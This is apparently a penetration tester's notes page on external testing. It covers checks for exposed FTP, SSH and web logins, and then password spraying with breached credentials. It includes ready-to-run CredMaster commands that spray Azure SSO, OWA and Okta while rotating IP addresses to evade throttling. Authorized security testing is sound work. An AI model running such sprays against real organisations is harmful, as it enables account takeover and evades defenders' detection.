External

Once we have performed OSINT and additional enumeration we can start more active testing such as:

Checking if FTP is open, and if anonymous login is enabled.
Checking if SSH is open and if it takes password authentication.
Look at all http/https pages for login pages, information disclosure, and default login credentials.

Password Spraying

We can password spray using the usernames, and emails we obtained using OneDrive User Enum and usernames, emails, and passwords from Dehashed-API-Tool. I typically spray with passwords found from Dehashed-API-Tool, and WeakPasswords.net

Credmaster

This tool will require an Amazon AWS Account to utilize their API. This tool uses Fireprox APIs to rotate IP addresses, stay anonymous, and beat throttling. This tool can spray against multiple environments, but the most common ones I run into are:

AzureSSO

python3 credmaster.py --config config.json --plugin azuresso --domain domain.com -u users.txt -p wordlist.txt --region us-east-1 --delay 20 --randomize --trim -o OUTFILE

python3 credmaster.py --config config.json --plugin owa --domain domain.com -u users.txt -p wordlist.txt --region us-east-1 --delay 20 --randomize --trim -o OUTFILE

Okta

python3 credmaster.py --config config.json --plugin okta --domain domain.com -u users.txt -p wordlist.txt --region us-east-1 --delay 20 --randomize --trim -o OUTFILE

More Coming Soon

Last updated 21 hours ago